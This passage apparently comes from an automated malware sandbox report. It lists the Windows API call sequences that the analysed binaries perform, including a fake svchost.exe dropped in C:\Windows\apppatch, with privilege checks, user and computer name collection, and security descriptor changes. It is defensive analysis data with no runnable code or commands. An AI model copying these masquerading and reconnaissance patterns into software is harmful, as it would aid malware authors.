etSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,IsUserAnAdmin,IsUserAnAdmin,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,Un
lockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 2_2_02644B00
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_01324B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,Lock
File,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 5_2_01324B00
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013E4B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,Lock
File,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 6_2_013E4B00
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01514B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemWindowsDirectoryA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,#680,#680,SetFilePointer,Lock
File,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-20h], 00000419h 8_2_01514B00
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403A20
Source: C:\Users\user\Desktop\uavINoSIQh.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,0_2_00402D30
Source: C:\Windows\apppatch\svchost.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,2_2_00403A20
Source: C:\Windows\apppatch\svchost.exeCode function: EntryPoint,LoadLibraryA,GetModuleFileNameA,ExitProcess,FindWindowA,GetTickCount,PostMessageA,IsUserAnAdmin,IsUserAnAdmin,ExitProcess,ExitProcess,IsUserAnAdmin,GetModuleHandleA,GetProcAddress,GetCurrentProcess,StrStrIA,GetCurrentProcessId,Sleep,StrStrIA,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,GlobalFindAtomA,GlobalAddAtomA,IsUserAnAdmin,RtlAdjustPrivilege,IsUserAnAdmin,ExitProcess,2_2_00402D30
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02655720
Source: C:\Windows\apppatch\svchost.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,2_2_02647FD0
Source: C:\Windows\apppatch\svchost.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandl
eA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,2_2_02656CA0
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,StrStrIA,2_2_02662B40
Source: C:\Windows\apppatch\svchost.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,2_2_02662BB0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,2_2_0264D970
Source: C:\Windows\apppatch\svchost.exeCode function: memset,VirtualQuery,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,2_2_02641170
Source: C:\Windows\apppatch\svchost.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_02641660
Source: C:\Windows\apppatch\svchost.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,IsUserAnAdmin,PathFindFileNameA,StrStrIA,IsUserAnAdmin,StrStrIA,IsUserAnAdmin,StrStrIA,2_2_02643610
Source: C:\Windows\apppatch\svchost.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,2_2_0265CE10
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,2_2_02661690
Source: C:\Windows\apppatch\svchost.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,2_2_02663F50
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,2_2_02661460
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,2_2_02663CE0
Source: C:\Windows\apppatch\svchost.exeCode function: GetUserNameA,memset,StrStrIA,2_2_0265ADE0
Source: C:\Windows\apppatch\svchost.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,2_2_026625C0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStr
IA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,5_2_01336CA0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIW,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,StrStrIW,WideCharToMultiByte,GetProcessHeap,HeapAlloc,memset,WideCharToMultiByte,CreateThread,CreateThread,GetHandleInformation,CloseHandle,5_2_01321170
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,GetComputerNameA,lstrlenA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,wsprintfA,wsprintfA,GetModuleHandleA,wsprintfA,5_2_0132D970
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,StrStrIA,5_2_01342B40
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,memset,GetModuleFileNameA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,StrStrIA,PathAddBackslashA,SetCurrentDirectoryA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,5_2_01342BB0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetUserNameA,memset,StrStrIA,5_2_0133ADE0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,PathFileExistsA,StrStrIA,strstr,strstr,strstr,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,5_2_013425C0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,CreateMutexA,Sleep,ReleaseMutex,GetHandleInformation,CloseHandle,5_2_01341460
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,PathFindFileNameA,GetPrivateProfileStringA,CharUpperA,CharUpperA,CharUpperA,StrStrIA,PathAddBackslashA,5_2_01343CE0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,5_2_01335720
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: FindWindowW,FindWindowW,Sleep,Sleep,FindWindowW,GetModuleFileNameA,StrStrIA,StrStrIA,PathFileExistsA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,StrStrIA,GetFileAttributesA,PathAddBackslashA,_snprintf,PathAddBackslashA,_snprintf,PathAddBackslashA,PathAddBackslashA,CreateMutexA,Sleep,ReleaseMutex,5_2_01343F50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: OpenMutexA,OpenMutexA,Sleep,Sleep,OpenMutexA,ReleaseMutex,GetHandleInformation,CloseHandle,GetModuleFileNameA,StrStrIA,ExitProcess,SetEvent,Sleep,5_2_01327FD0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA,5_2_01323610
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: StrStrIA,PathAddBackslashA,OpenProcess,GetModuleFileNameExA,GetHandleInformation,CloseHandle,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,GetFileAttributesA,SetCurrentDirectoryA,PathAddBackslashA,SetFileAttributesA,DeleteFileA,PathAddBackslashA,PathFileExistsA,5_2_0133CE10
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetUserObjectInformationA,GetCurrentThreadId,GetProcAddress,GetModuleFileNameA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,StrStrIA,GetProcAddress,GetModuleHandleA,GetProcAddress,5_2_01321660
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: GetModuleFileNameA,StrStrIA,GetAncestor,GetWindowTextA,CreateThread,GetHandleInformation,CloseHandle,5_2_01341690
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,Cre